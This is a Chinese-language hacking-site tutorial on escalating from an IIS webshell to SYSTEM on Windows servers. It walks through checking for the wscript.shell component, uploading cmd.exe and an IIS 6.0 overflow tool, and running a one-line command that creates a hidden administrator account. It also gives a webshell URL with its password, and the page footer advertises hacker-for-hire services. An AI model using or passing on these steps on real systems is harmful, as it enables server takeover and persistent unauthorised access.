Windows系统溢出提权
手机扫一扫
黑客病毒漏洞黑防入侵DDOS病毒硬件
黑资讯> 黑客资讯>Windows系统溢出提权

Windows系统溢出提权

黑客资讯访客1970-01-01 8:00:003051A+A-

1、简介


window 服务器 常用的是win2003 win2008 win2012

在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用

户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大

范围测试。

 

2、程序权限的对比

 

在iis里面 权限依次的大小对比

aspx->php=>asp

aspx默认能执行终端命令

php和asp 如果不能执行命令,在组件没有删除的情况下,可以上传cmd到可执行目录、执行命令 均可以执行终端命令。

执行命令的组件

wscript.shell √ 命令行执行组件,显示

 

3、 溢出过程


1在webshell中能执行终端命令


2上传溢出exp


3执行命令

 

4、实战


在iis里面默认上传的大小是200k 大于就会报错。

webshell
http://www.demoasp.com/sb.asp 密码F4ck


查看组件是否删除

 1559890706824445.jpg


查看目录是否可写 可写则上传cmd.exe 执行命令

1559890733119279.jpg

上传溢出工具 ii6.0溢出工具执行

1559890809241838.jpg

 

当前的权限就是system用户


增加用户命令

C:\RECYCLER\iis6.0.exe"net user moonsec moonsec /add & net localgroup administrators moonsec/add"

 

1559890901966493.png

 

登录服务器

1559890932509539.png

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
黑客网站黑客接单黑客技术黑客工具网络安全渗透测试编程技术免费黑客学习网

相关文章

  • 1条评论
  • 性许路岷2022-06-03 04:42:04
  • 终端命令2上传溢出exp3执行命令 4、实战在iis里面默认上传的大小是200k 大于就会报错。webshellhttp://www.demoasp.com/sb.asp 密码F4ck查看组件是否删除
发表评论

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理